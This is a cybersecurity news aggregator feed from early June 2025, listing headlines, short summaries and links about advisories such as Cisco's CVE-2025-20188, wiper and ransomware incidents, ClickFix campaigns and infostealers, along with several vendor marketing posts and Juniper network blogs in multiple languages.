Feed

Cisco IOS XE Wireless Controller Software Arbitrary File Upload Vulnerability
2025-06-07T00:10:44Z | 1749255044

A vulnerability in the Out-of-Band Access Point (AP) Image Download, the Clean Air Spectral Recording, and the client debug bundles features of Cisco IOS XE Software for Wireless LAN Controllers (WLCs) could allow an unauthenticated, remote attacker to upload arbitrary files to an affected system. This vulnerability is due to the presence of a hard-coded JSON Web Token (JWT) on an affected system.  An attacker could exploit this vulnerability by sending crafted HTTPS requests to the AP file upload interface. A successful exploit could allow the attacker to upload files, perform path traversal, and execute arbitrary commands with root privileges.  Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC This advisory is part of the May 2025 release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: May 2025 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication. Security Impact Rating: Critical CVE: CVE-2025-20188

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC
Cybercriminals Are Hiding Malicious Web Traffic in Plain Sight
2025-06-06T19:05:57Z | 1749236757

In an effort to evade detection, cybercriminals are increasingly turning to “residential proxy” services that cover their tracks by making it look like everyday online activity.

https://www.wired.com/story/cybercriminals-are-hiding-malicious-web-traffic-in-plain-sight/
Russia-linked threat actors targets Ukraine with PathWiper wiper
2025-06-06T18:30:42Z | 1749234642

A Russia-linked threat actor targeted a critical infrastructure organization in Ukraine with a new destructive malware dubbed PathWiper. Russia-linked threat actor targeted Ukraine’s critical infrastructure with a new wiper named PathWiper. Cisco Talos researchers reported that attackers utilized a legitimate endpoint administration tool, indicating they had access to the administrative console, then used it to […]

https://securityaffairs.com/178726/apt/russia-linked-threat-actors-targets-ukraine-with-pathwiper-wiper.html
Android security advisory – June 2025 monthly rollup (AV25-322)
2025-06-06T18:11:55Z | 1749233515

https://cyber.gc.ca/en/alerts-advisories/android-security-advisory-june-2025-monthly-rollup-av25-322
Popular Chrome Extensions Found Leaking Data via Unencrypted Connections
2025-06-06T17:54:48Z | 1749232488

Popular Chrome extensions exposed user data by sending it over unencrypted HTTP, raising privacy concerns. Symantec urges caution for users.

https://hackread.com/popular-chrome-extensions-data-leak-unencrypted-connection/
DOJ files complaint to get nearly $8 million in stolen funds back from North Korea
2025-06-06T17:47:00Z | 1749232020

The DPRK has long been tracked as a cyber actor that uses worker schemes to steal funds for its missile program and other regime goals.

https://www.nextgov.com/cybersecurity/2025/06/doj-files-complaint-get-nearly-8-million-stolen-funds-back-north-korea/405886/
F5 Acquires Agentic AI Security Startup Fletch
2025-06-06T17:38:08Z | 1749231488

Agentic AI technology will be integrated into the recently launched F5 Application Delivery and Security Platform.

https://www.darkreading.com/application-security/f5-acquires-agentic-ai-security-startup-fletch
Defending the Enterprise in the Age of Deception
2025-06-06T17:37:56Z | 1749231476

The post Defending the Enterprise in the Age of Deception appeared first on Graylog.

https://graylog.org/resources/defending-the-enterprise-in-the-age-of-deception/
The Good, the Bad and the Ugly in Cybersecurity – Week 23
2025-06-06T17:31:18Z | 1749231078

Police seize major dark market, APT targets Kurdish and Iraqi government officials, and actors abuse AI to compromise software supply chains.

https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-23-6/
Microsoft shares script to restore inetpub folder you shouldn’t delete
2025-06-06T17:28:07Z | 1749230887

Microsoft has released a PowerShell script to help restore an empty 'inetpub' folder created by the April 2025 Windows security updates if deleted. As Microsoft previously warned, this folder helps mitigate a high-severity Windows Process Activation privilege escalation vulnerability.

https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-script-to-restore-inetpub-folder-you-shouldnt-delete/
Direct File is 'beloved by its users,' internal IRS report says
2025-06-06T17:28:00Z | 1749230880

The IRS is reportedly ending the Direct File, but a report obtained via the Freedom of Information Act says that 94% of users rated their experience as “excellent” or “above average.”

https://www.nextgov.com/digital-government/2025/06/direct-file-beloved-its-users-internal-irs-report-says/405883/
BADBOX 2.0 Targets Home Networks in Botnet Campaign, FBI Warns
2025-06-06T17:18:53Z | 1749230333

Though the operation was partially disrupted earlier this year, the botnet remains active and continues to target connected Android devices.

https://www.darkreading.com/threat-intelligence/badbox-home-networks-botnet-campaign-fbi
Tax resolution firm Optima Tax Relief hit by ransomware, data leaked
2025-06-06T17:14:17Z | 1749230057

U.S. tax resolution firm Optima Tax Relief suffered a Chaos ransomware attack, with the threat actors now leaking data stolen from the company.

https://www.bleepingcomputer.com/news/security/tax-resolution-firm-optima-tax-relief-hit-by-ransomware-data-leaked/
Town of Kittery, Maine falls victim to INC RANSOM Ransomware
2025-06-06T17:01:09Z | 1749229269

Town of Kittery, Maine falls victim to INC RANSOM Ransomware

https://darkwebinformer.com/town-of-kittery-maine-falls-victim-to-inc-ransom-ransomware/
New Rust-Developed InfoStealer Drains Sensitive Data from Chromium-Based Browsers
2025-06-06T16:55:00Z | 1749228900

A newly identified information-stealing malware, crafted in the Rust programming language, has emerged as a significant threat to users of Chromium-based browsers such as Google Chrome, Microsoft Edge, and others. Dubbed “RustStealer” by cybersecurity researchers, this sophisticated malware is designed to extract sensitive data, including login credentials, cookies, and browsing history, from infected systems. Emerging […] The post New Rust-Developed InfoStealer Drains Sensitive Data from Chromium-Based Browsers appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/new-rust-developed-infostealer/
Wireshark Filters
2025-06-06T16:31:24Z | 1749227484

Wireshark Filters

https://darkwebinformer.com/wireshark-filters/
Hackers Leverage New ClickFix Tactic to Exploit Human Error with Deceptive Prompts
2025-06-06T16:28:00Z | 1749227280

A sophisticated social engineering technique known as ClickFix baiting has gained traction among cybercriminals, ranging from individual hackers to state-sponsored Advanced Persistent Threat (APT) groups like Russia-linked APT28 and Iran-affiliated MuddyWater. This method targets human end users as the weakest link in cybersecurity defenses, tricking them into executing malicious commands through seemingly benign prompts. A […] The post Hackers Leverage New ClickFix Tactic to Exploit Human Error with Deceptive Prompts appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/hackers-leverage-new-clickfix-tactic-to-exploit-human-error/
New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users
2025-06-06T16:25:00Z | 1749227100

Cybersecurity researchers are alerting to a new malware campaign that employs the ClickFix social engineering tactic to trick users into downloading an information stealer malware known as Atomic macOS Stealer (AMOS) on Apple macOS systems. The campaign, according to CloudSEK, has been found to leverage typosquat domains mimicking U.S.-based telecom provider Spectrum. "macOS users are served a...

https://thehackernews.com/2025/06/new-atomic-macos-stealer-campaign.html
5 signs your healthcare fax solution needs an upgrade
2025-06-06T16:18:18Z | 1749226698

Fax remains an essential part of healthcare communications, owing to its security, traceability and HIPAA-compliance. Seven in U.S. 10 hospitals still rely on fax to exchange health information, according to the Office of the National Coordinator (ONC) for Healthcare Information Technology.   Fax has evolved dramatically, from outdated analog systems with paper and physical machines to modern cloud-based solutions. Despite all the technological advancements and adoption of electronic healthcare records, many healthcare organizations are still relying on aging fax systems with complex on-premises infrastructure which leads to inefficiencies, security risks and limited interoperability. Here are five signs that your organization’s fax solution needs modernization:  1. High failure rates  Does your fax system performance leave something to be desired? High fax failure rates in healthcare can delay the transmission of critical information like referrals, lab results, and treatment plans, leading to postponed diagnoses, disrupted care coordination, and ultimately poorer patient outcomes. At the same time, these failures create costly inefficiencies for providers, as staff must spend valuable time troubleshooting, resending, and verifying faxes, which increases labor costs and reduces productivity. Delays can also impact billing cycles, slow down reimbursements, and damage patient satisfaction hurting both clinical performance and the organization's financial health. 2. Security vulnerabilities, compliance risks   Aging fax systems pose significant security and compliance risks because they rely heavily on manual processes, making them prone to human errors like misdirected faxes and unattended documents, key contributors to many data breaches. These systems typically lack modern safeguards such as encryption, access controls, and audit trails, leaving sensitive patient data vulnerable to interception or unauthorized access. As a result, any breach intentional or accidental can lead to serious regulatory consequences and financial losses, contributing to the rising average cost of data breaches in healthcare. Research shows that over 85% of all data breaches involved a human element. The average cost of a data breach jumped to $4.88 million in 2024, according to analysis of data compiled by the Ponemon Institute. That’s up 10% from the year prior.  3. Hidden costs of legacy systems   Healthcare organizations often drain valuable IT resources maintaining aging, on-premises fax and telephony systems, or rely on third-party providers with unreliable networks. These outdated technologies not only demand constant upkeep but also cause frequent transmission errors and communication breakdowns. As a result, front-line staff are burdened with correcting issues instead of focusing on patient care, leading to operational inefficiencies, delayed treatment, and ultimately a diminished patient experience. 4. Integration challenges with modern EHR systems   Interoperability continues to be a challenge in U.S. healthcare settings with hundreds of different electronic health record (EHR) systems in use at different hospitals and clinics, often tailored to specific needs. With nearly 90% of U.S. based physicians using an EHR, ensuring related systems are integrated is essential. Integrating digital fax systems with modern EHRs ensures seamless and timely care coordination.   5. Information bottlenecks and the impact on clinical staff and patient experience   Legacy fax systems often create delays as faxes wait in queues for manual processing. Removing these bottlenecks with integrated AI enabled capture solutions can help speed workflows while reducing processing delays and human error.   Digital fax success stories in healthcare  Fax reliability and care coordination are directly connected. The University of Kansas Health System was dealing with a rise in fax transmission errors while local telcos reduced support for analog fax solutions. Employees spent significant amounts of time resending faxes and 90% of IT time was spent troubleshooting fax issues. By working with OpenText, they were able to implement a hybrid, HIPAA compliant digital fax solution that boosted fax transmission success to nearly 100%.   The Baptist Hospitals of Southeast Texas reduced the risk of delays to front-line patient services by improving the availability of fax services. The healthcare provider also avoided rising costs for fax lines as telcos phase out analog services. They boosted clinical efficiency by 20% while unlocking $200,000 in annual cost savings with a HIPAA-compliant fax solution from OpenText.  Building a business case for digital fax  1. Start with why: connect to patient care  When building your case, anchor the conversation in patient outcomes and clinician efficiency. Analog fax systems often lead to delays, missed referrals, and security gaps—none of which are acceptable in a patient-centered environment.  Tip: Use real stories. Did a critical patient referral get delayed because a fax line was busy? Share that. It brings urgency to the conversation.  2. Quantify the hidden costs of analog fax  It’s easy to overlook how expensive traditional faxing really is. Tally up the costs of:  Analog phone lines – monthly charges for each line used exclusively for faxing.  Third-party telephony services – fees paid to external vendors that may lack reliability or SLAs.  Hardware maintenance – costs for servicing or replacing fax machines, plus depreciation over time.  Consumables - paper, toner, and fax machine maintenance.  Staff labor costs - time spent manually sending, receiving, filing, and routing faxes.  Error correction and rework - time and resources spent on resolving failed transmissions or mis-faxes. Transmission failures and downtime - impact of fax delays on clinical workflows, patient care, and revenue cycles. Storage and archiving costs - physical space or systems needed to store paper records or scanned documents. Opportunity costs - value of time and resources that could be re-directed to higher value patient care or innovation if fax related burdens were reduced. Tip: Benchmark your current costs against digital fax solutions.   3. Highlight the compliance and security risks  Healthcare is one of the most regulated industries—and analog faxing creates gaps:  No audit trails for those who sent or received a fax  Risk of PHI left in trays or misdialed numbers  Lack of access controls  Digital fax offers encryption, audit logs, and user-level access management that help you stay on the right side of HIPAA, HITECH, and other regulations.  Tip: Talk to your compliance team early. Their support can strengthen your case dramatically.  4. Align with strategic goals  Most healthcare organizations have digital transformation initiatives underway. Show how digital fax aligns with broader goals:  Supporting remote and hybrid work  Reducing paper-based processes  Improving interoperability with EHRs and other systems  Tip: Reframe digital fax as an enabler of strategic priorities, not just a utility replacement.  5. Propose a phased approach  Large IT projects can feel daunting. Ease leadership concerns by recommending a phased rollout:  Start with a pilot in a department with high fax volume (e.g., referrals, radiology, or medical records)  Measure success, then expand  Tip: Choose a modern, cloud-native fax solution that eliminates the need for legacy infrastructure and supports rapid scalability across departments without the complexity of maintaining analog systems. 6. Estimate ROI and payback period  Executives want numbers. Estimate how long it will take to recoup the investment based on reduced costs and improved productivity. Most healthcare organizations see ROI within 6–12 months.  Tip: Include both hard savings (e.g., eliminated phone lines) and soft savings (e.g., time saved per fax, reduced risk of fines).  Digital transformation in healthcare isn’t just about big-ticket technologies. Sometimes, the biggest gains come from modernizing the tools we rely on every day. Fax is still essential—but it doesn’t have to be analog or on-premises. Build your case thoughtfully, and you’ll not only win leadership support—you’ll give your teams a faster, safer, and smarter way to connect with HIPAA-compliant fax.  The post 5 signs your healthcare fax solution needs an upgrade appeared first on OpenText Blogs.

https://blogs.opentext.com/5-signs-your-healthcare-fax-solution-needs-an-upgrade/
Hundreds of Malicious GitHub Repos Targeting Novice Cybercriminals Traced to Single User
2025-06-06T16:02:00Z | 1749225720

Sophos X-Ops researchers have identified over 140 GitHub repositories laced with malicious backdoors, orchestrated by a single threat actor associated with the email address ischhfd83[at]rambler[.]ru. Initially sparked by a customer inquiry into the Sakura RAT, a supposed open-source malware touted for its “sophisticated anti-detection capabilities,” the investigation revealed a much broader and more insidious campaign. […] The post Hundreds of Malicious GitHub Repos Targeting Novice Cybercriminals Traced to Single User appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/hundreds-of-malicious-github-repos-targeting-novice-cybercriminals/
K000151739: Linux kernel vulnerability CVE-2024-47745
2025-06-06T16:01:21Z | 1749225681

Security Advisory Description In the Linux kernel, the following vulnerability has been resolved: mm: call the security_mmap_file() LSM hook in remap_file_pages() The remap_file_pages syscall ...

https://my.f5.com/manage/s/article/K000151739
Fresh strain of pro-Russian wiper flushes Ukrainian critical infrastructure
2025-06-06T16:01:13Z | 1749225673

Destructive malware has been a hallmark of Putin's multi-modal war A new strain of wiper malware targeting Ukrainian infrastructure is being linked to pro-Russian hackers, in the latest sign of Moscow's evolving cyber tactics.

https://go.theregister.com/feed/www.theregister.com/2025/06/06/pro_russia_wiper_ukraine/
Assigning and completing issues with coding agent in GitHub Copilot
2025-06-06T16:00:00Z | 1749225600

Have you tried the new coding agent in GitHub Copilot? Here’s how developers are using it to work more efficiently. The post Assigning and completing issues with coding agent in GitHub Copilot appeared first on The GitHub Blog.

https://github.blog/ai-and-ml/github-copilot/assigning-and-completing-issues-with-coding-agent-in-github-copilot/
IT Support Impersonated in Voice Phishing Campaign
2025-06-06T16:00:00Z | 1749225600

An observed voice phishing campaign is impersonating IT support workers.

https://www.securitymagazine.com/articles/101676-it-support-impersonated-in-voice-phishing-campaign
Inside OpenAI’s wishlist for the House AI-Energy working group
2025-06-06T15:52:00Z | 1749225120

Comments submitted by OpenAI leadership to a House group dedicated to AI and energy reiterated the need for broad infrastructure investments.

https://www.nextgov.com/artificial-intelligence/2025/06/inside-openais-wishlist-house-ai-energy-working-group/405879/
Cisco patches critical flaw affecting Identity Services Engine
2025-06-06T15:48:13Z | 1749224893

The networking giant has urged enterprises to update immediately

https://www.itpro.com/security/cisco-patches-critical-flaw-affecting-identity-services-engine
ClickFix Attack Uses Fake Cloudflare Verification to Silently Deploy Malware
2025-06-06T15:35:00Z | 1749224100

A newly identified social engineering attack dubbed “ClickFix” has emerged as a significant threat, leveraging meticulously crafted fake Cloudflare verification pages to trick users into executing malicious code on their devices. This phishing tactic, disguised as a routine security check, exploits the familiarity of Cloudflare’s Turnstile CAPTCHA interface to deceive users into running hidden PowerShell […] The post ClickFix Attack Uses Fake Cloudflare Verification to Silently Deploy Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/clickfix-attack-uses-fake-cloudflare-verification/
Kettering Health confirms Interlock ransomware behind cyberattack
2025-06-06T15:26:10Z | 1749223570

Healthcare giant Kettering Health, which manages 14 medical centers in Ohio, confirmed that the Interlock ransomware group breached its network and stole data in a May cyberattack.

https://www.bleepingcomputer.com/news/security/kettering-health-confirms-interlock-ransomware-behind-cyberattack/
Control content chaos without compromising security
2025-06-06T15:08:11Z | 1749222491

You’ve heard the argument: We needed the sales presentation immediately and marketing couldn’t turn it around quick enough, so we pulled a few images from the web, generated some AI copy and put our logo on it. Repeat this same scenario but replace the marketer with the HR teammate who needed a training guide or the regional event manager who developed materials on the fly for a show. All good-intentioned, but did the unauthorized tools the employees used create security vulnerabilities, licensing compliance issues, and branding violations? Across departments like marketing, HR/communications, and sales, there’s a rising demand for personalized, on-brand content. Both internal and remote teams need compelling, scalable assets to keep pace with a fast-moving business environment and capture the attention of increasingly distracted audiences. The good news is AI technology has made professional-grade creative tools more accessible and has significantly lowered the cost of content production. The opportunity exists for you to equip your business users with access to tools to build their own content while staying in compliance with brand and IT infrastructure policies. With Adobe Express, you can drive digital transformation by enabling secure, scalable technology adoption across the organization. Accelerate content creation with AI-powered tools The opportunity for marketing, in partnership with IT, is to enable business teams to create brand-compliant content independently through governed systems and processes. A starting point in this transformation is identifying the different business user needs and determining what tools are needed. Your marketing team is responsible for creating compelling, on-brand deliverables for your company. They also have a responsibility for maintaining brand compliance to ensure your company is represented with quality and consistency across all surfaces. As power users, they need the professional level apps found in Adobe Creative Cloud Pro which includes apps like Photoshop, InDesign, Illustrator, Premiere Pro and Adobe Express. For example, the latest AI features built into the Creative Cloud apps help marketing teams accelerate time-to-market while maintaining brand quality and consistency. The AI-powered workflows and content reuse also help marketers reduce production costs. Other teams can also gain benefits from these tools. Sales, human resources, training, and other staff need to quickly create content that can be personalized to their audiences. They typically face challenges with slow turnaround time to receive collateral from marketing, a lack of skills to use professional creative tools, and having to divert their time from day-to-day responsibilities to take on content production. That’s why they need easy tools – that require limited training – to help them quickly create content and re-purpose existing content with customized messaging. Speed, security, scalability: Optimize with Adobe Adobe Express meets the rising demand for content that adheres to IT and marketing policies. The solution enables marketers to create pre-approved templates with built-in guardrails such as locked elements and style controls. For example, Brand Kits lets your marketing team implement a scalable content approach that also protects your brand. Implementing Adobe Express across the organization optimizes your tech infrastructure while maintaining security and reliability. Creation of these approved materials gives your organization instant access to approved templates and assets in a brand-customized home experience. Adobe Express lets even a novice creator develop all types of materials – social media posts, presentations, printable content – with drag-and-drop ease using the all-in-one editor feature. For example, Quick Actions enables users to make quick enhancements to photos, videos, and PDFs. Also, the solution provides access to millions of high-quality Adobe Stock images, fonts, and videos, which protects users – and your organization – from the security risks of importing unknown materials from the web. The solution is also a cost saver. For example, unused and pro licenses are a costly investment for individuals with light usage needs. Providing Adobe Express licenses to sales, human resources, and others that are creating content is a cost-effective way to reduce operational expenses while implementing commercially safe AI content tools. The demand for new content will continue to grow. Create the foundation for your team to create content at scale – and retain IT governance. Explore the options to implement Adobe Express across your organization or teams today.

https://www.cio.com/article/4003202/control-content-chaos-without-compromising-security.html
DragonForce Ransomware Reportedly Compromised Over 120 Victims in the Past Year
2025-06-06T15:08:00Z | 1749222480

DragonForce, a ransomware group first identified in fall 2023, has claimed over 120 victims in the past year, marking its rapid ascent as a formidable player in the ransomware ecosystem. Initially operating under a Ransomware-as-a-Service (RaaS) model, DragonForce has since pivoted to a ransomware cartel structure, as announced in March 2025 on its data leak […] The post DragonForce Ransomware Reportedly Compromised Over 120 Victims in the Past Year appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/dragonforce-ransomware-reportedly-compromised-over-120-victims/
Jenkins security advisory (AV25-321)
2025-06-06T15:03:18Z | 1749222198

https://cyber.gc.ca/en/alerts-advisories/jenkins-security-advisory-av25-321
Self-Driving Network™로 가는 여정 2단계: 인사이트
2025-06-06T14:59:14Z | 1749221954

Official Juniper Networks Blogs Self-Driving Network™로 가는 여정 2단계: 인사이트 이전 게시물에서는 셀프 드라이빙 네트워크(Self-Driving Network™) 여정의 1단계인 지능형 네트워크의 핵심 기반인 데이터에 대해 살펴보았습니다. 하지만 데이터만으로는 문제를 해결할 수 없습니다. 2단계는 수학과 데이터 사이언스를 적용하여 데이터에서 실제 가치를 추출하는 단계로, 원시 정보를 The post Self-Driving Network™로 가는 여정 2단계: 인사이트 appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/ko-kr/korean-blog/stage-2-on-a-journey-to-the-self-driving-network-insights-kr
Alleged Data Breach of Ministry of Health of Peru
2025-06-06T14:58:19Z | 1749221899

Alleged data breach of Ministry of Health of Peru

https://darkwebinformer.com/alleged-data-breach-of-ministry-of-health-of-peru/
HPE security advisory (AV25-320)
2025-06-06T14:53:17Z | 1749221597

https://cyber.gc.ca/en/alerts-advisories/hpe-security-advisory-av25-320
Nigeria jails 9 Chinese nationals for being part of international cyberfraud syndicate
2025-06-06T14:49:27Z | 1749221367

The group was arrested in December as part of a raid that included 599 Nigerians and 193 other foreign nationals, many of them Chinese, on suspicion of being involved in a range of online crimes.

https://therecord.media/nigeria-jails-9-chinese-nationals-cyber-fraud
Nigeria jails 9 Chinese nationals for being part of international cyberfraud syndicate
2025-06-06T14:49:27Z | 1749221367

The group was arrested in December as part of a raid that included 599 Nigerians and 193 other foreign nationals, many of them Chinese, on suspicion of being involved in a range of online crimes.

https://therecord.media/nigeria-jails-9-chinese-nationals-cyber-fraud
Corporate executives face mounting digital threats as AI drives impersonation
2025-06-06T14:44:52Z | 1749221092

Malicious actors are using deepfakes and voice-cloning technology to target senior executives in both the workplace and personal spaces.

https://www.cybersecuritydive.com/news/corporate-executives-threats-ai-impersonation/750064/
Corporate executives face mounting digital threats as AI drives impersonation
2025-06-06T14:44:52Z | 1749221092

Malicious actors are using deepfakes and voice-cloning technology to target senior executives in both the workplace and personal spaces.

https://www.cybersecuritydive.com/news/corporate-executives-threats-ai-impersonation/750064/
Beware: Fake AI Business Tools Spreading Hidden Ransomware
2025-06-06T14:44:00Z | 1749221040

As small businesses increasingly adopt artificial intelligence (AI) tools to streamline operations, cybercriminals are seizing the opportunity to deploy ransomware through deceptive campaigns. According to a recent report by Cisco Talos, attackers are masquerading as legitimate AI software providers, embedding malware within counterfeit applications that mimic popular services. With 98% of small businesses using at […] The post Beware: Fake AI Business Tools Spreading Hidden Ransomware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/fake-ai-business-tools-spreading-hidden-ransomware/
Self-Driving Network™への移行の第2段階:インサイト
2025-06-06T14:42:34Z | 1749220954

Official Juniper Networks Blogs Self-Driving Network™への移行の第2段階:インサイト  前回の投稿記事では、Self-Driving Network™への移行の第1段階、すなわち、データについて説明しました。データはインテリジェントなネットワークに欠かせない基盤です。しかし、データだけでは問題は解決しません。第2段階では、数理学とデータサイエンスを適用してデータから真の価値を取り出します。すなわち、未加工の情報から、ネットワークの管理方法を変える精度の高い実用的なインサイトへと変換します。       インサイトの価値  従来のトラブルシューティングでは、暗号のようなCLIコマンド、ログファイル、手作業で操作するチェック用デバイスなどを用いて調査を行います。これは事後対応で行うプロセスであり、時間もかかりフラストレーションもたまります。IT運用チームは遅れを取り戻そうと躍起になりますが、問題が解決されるのは、ユーザーが問題を報告した後に限られます。1つの問題点を探し出すのは、干し草の中から1本の針を見つけるようなものです。考えられる原因は無数にあるからです。   AIネイティブのインサイトを利用すれば、こうした当て推量の作業をする必要がなくなります。IT運用チームは、ログやコマンドライン出力を基に探し回る代わりに、ユーザーが気づく前に問題を検知して解決できます。適切なデータインサイトが事前に問題を明らかにするため、「火消し作業」に追われるフラストレーションや絶え間なく続くトラブルシューティング作業から解放されます。   実際のインパクト  AIおよびAIが提供するインサイトに対する信用と信頼を得るためには、IT運用チームがその目で見て信じる必要があるかもしれません。私のお気に入りの事例は、ある懐疑的なITマネージャーとPoC(概念実証)で一緒に作業したときのことです。そのITマネージャーは、Juniper Mist AI™が本当にネットワーク管理の役に立つのか、自分たちが気づかなかった問題を検出できるのかと疑っていました。PoCの間、デバイスを接続できたのは、ジュニパーのネットワークではなく他社のネットワークでした。幸いなことに、データインサイトによって、Mist以外のルーターにMTU(最大送信単位)の設定ミスがあり、認証パケットの通過を妨げていたことを当社は発見できました。    別のケースでは、Mist AIがある従業員のデスクにあるイーサネットケーブルの障害を検知しました。この問題は誰も報告していませんでした。当初、IT運用チームはこのアラートを真剣に受け止めませんでした。しかし、IT運用チームがその従業員に確認を取ると、その従業員は有線ネットワークが信頼できないという理由で、ひそかにWi-Fiに切り替えていたことが判明しました。Mist AIは、IT運用チームが発見できなかった問題を表面化しました。    最初は懐疑的だったITマネージャーは、Mist AIがこうした問題や他の問題を正確に特定するのを見て、信頼を置くようになりました。   このような細かい可視化によって、さまざまな業界でIT運用の変革が進んでいます。Gap Inc.などの小売企業は現在では、ネットワーク正常性に対して詳細なインサイトを得るようにしており、これによって障害対応チケットを最大90%削減できています。「今では、データを細分化して、特定の店舗で問題が発生していることを明確に把握することができます」と、Gap Inc.のグローバルネットワークアーキテクトであるスネハル・パテル氏は述べています。店舗レベルでインサイトを得ることで、IT運用チームは迅速に対応することが可能になり、従業員とお客様にシームレスな接続を提供できるようになっています。   高等教育機関も多大なメリットを見出しています。ダートマス大学では、Mist AIによってキャンパスのすべてのユーザーが優れたエクスペリエンスを享受できるようになりました。「問題に遭遇しているユーザーが全体のわずか2%であっても、その問題を即座に解決できます」と、ダートマス大学のCIO、ミッチ・デイビス氏は述べています。AIネイティブのインサイトを活用することで、IT運用チームは広範囲にわたる苦情が寄せられるのを待っている必要はなくなりました。事前対応で問題を特定して対応できるため、学生やスタッフに一貫した高品質のエクスペリエンスを提供できます。   Mist AIのインサイトは、可視化のみならず、組織にとってますます大きな課題になりつつあるITスキルギャップの解消にも役立ちます。例えば、Rady小児病院では、AIによってネットワーク管理の敷居を低くする取り組みを続けています。「経験豊富なエンジニアに、関係性の薄いメトリックを集めて解釈してもらう必要がなくなりました。今では、AからBまで問題を直接見通すことができるようになりました」と、Rady小児病院のネットワークエンジニアチームのリーダー、ダニエル・マディン氏は述べています。こうした転換によって、スキルの高いエンジニアはイノベーションや戦略的なプロジェクトに集中できるようになり、まだ経験の少ないスタッフは日常的な運用を自信をもって管理できるようになりました。IT運用チームに大きく負荷がかかっていた頃であれば、この能力は特に貴重です。   移行の続き  インサイトの獲得によって状況は一変し、IT運用チームはこれまで以上に迅速かつ効率的に問題を解決できるようになります。しかし、次の段階に進み、インサイトを推奨事項に変換すると、さらに大きな可能性が開けます。次回の投稿では、AIネイティブの推奨事項がどのようにして事前対応のネットワーク管理を実現し、真のSelf-Driving Networkへ私たちを近づけていくのかについて説明します。   お客様の組織は、Self-Driving Networkへの移行プロセスのどの段階にありますか? どの段階にあっても、ジュニパーは、お客様の次のステップをサポートします。     このブログシリーズの次の投稿をぜひお読みください。  このシリーズのその他のブログ  The post Self-Driving Network™への移行の第2段階:インサイト  appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/ja-jp/japanese-blog/stage-2-on-a-journey-to-the-self-driving-network-insights-jp
New PathWiper data wiper malware hits critical infrastructure in Ukraine
2025-06-06T14:40:31Z | 1749220831

A new data wiper malware named 'PathWiper' is being used in targeted attacks against critical infrastructure in Ukraine, aimed at disrupting operations in the country.

https://www.bleepingcomputer.com/news/security/new-pathwiper-data-wiper-malware-hits-critical-infrastructure-in-ukraine/
Fase 2- In viaggio verso il Self-Driving Network™: insight
2025-06-06T14:36:16Z | 1749220576

Official Juniper Networks Blogs Fase 2- In viaggio verso il Self-Driving Network™: insight  Nel nostro precedente post, abbiamo esplorato la prima tappa del viaggio verso il Self-Driving Network™: i dati, la base fondamentale per creare reti intelligenti. Ma i dati da soli non The post Fase 2- In viaggio verso il Self-Driving Network™: insight  appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/it-it/italian-blog/stage-2-on-a-journey-to-the-self-driving-network-insights-it
OpenAI takes down ChatGPT accounts linked to state-backed hacking, disinformation
2025-06-06T14:32:08Z | 1749220328

State-backed threat actors from a handful of countries are using ChatGPT for a range of malicious purposes, including malware refinement, employment scams and social media disinformation campaigns.

https://therecord.media/openai-takes-down-chatgpt-accounts-hacking
OpenAI takes down ChatGPT accounts linked to state-backed hacking, disinformation
2025-06-06T14:32:08Z | 1749220328

State-backed threat actors from a handful of countries are using ChatGPT for a range of malicious purposes, including malware refinement, employment scams and social media disinformation campaigns.

https://therecord.media/openai-takes-down-chatgpt-accounts-hacking
OpenAI takes down ChatGPT accounts linked to state-backed hacking, disinformation
2025-06-06T14:32:08Z | 1749220328

State-backed threat actors from a handful of countries are using ChatGPT for a range of malicious purposes, including malware refinement, employment scams and social media disinformation campaigns.

https://therecord.media/openai-takes-down-chatgpt-accounts-hacking
Fase 2 van de reis naar het zelfsturende netwerk: inzichten
2025-06-06T14:31:50Z | 1749220310

Official Juniper Networks Blogs Fase 2 van de reis naar het zelfsturende netwerk: inzichten In het vorige bericht gingen we in op de eerste fase van de weg naar het zelfsturende netwerk: data – de cruciale basis voor een intelligent netwerk. Maar met alleen The post Fase 2 van de reis naar het zelfsturende netwerk: inzichten appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/nl-nl/dutch-blog/stage-2-on-a-journey-to-the-self-driving-network-insights-nl
In Other News: FBI Warns of BadBox 2, NSO Disputes WhatsApp Fine, 1,000 Leave CISA
2025-06-06T14:30:00Z | 1749220200

Noteworthy stories that might have slipped under the radar: FBI issues an alert on BadBox 2 botnet, NSO disputing the $168 million WhatsApp fine, 1,000 people left CISA since Trump took office. The post In Other News: FBI Warns of BadBox 2, NSO Disputes WhatsApp Fine, 1,000 Leave CISA appeared first on SecurityWeek.

https://www.securityweek.com/in-other-news-fbi-warns-of-badbox-2-nso-disputes-whatsapp-fine-1000-leave-cisa/
Estágio 2 da jornada para a Self-Driving Network™: insights
2025-06-06T14:25:41Z | 1749219941

Official Juniper Networks Blogs Estágio 2 da jornada para a Self-Driving Network™: insights  Em nosso post anterior, investigamos o primeiro estágio da nossa jornada para a Self-Driving Network™ : os dados, a base fundamental para as redes inteligentes. Mas sozinhos os dados não resolvem problemas. O estágio The post Estágio 2 da jornada para a Self-Driving Network™: insights  appeared first on Official Juniper Networks Blogs.

https://blogs.juniper.net/pt-br/portuguese-blog/stage-2-on-a-journey-to-the-self-driving-network-insights-ptbr
Segunda etapa del camino a la red autónoma: información valiosa
2025-06-06T14:20:52Z | 1749219652

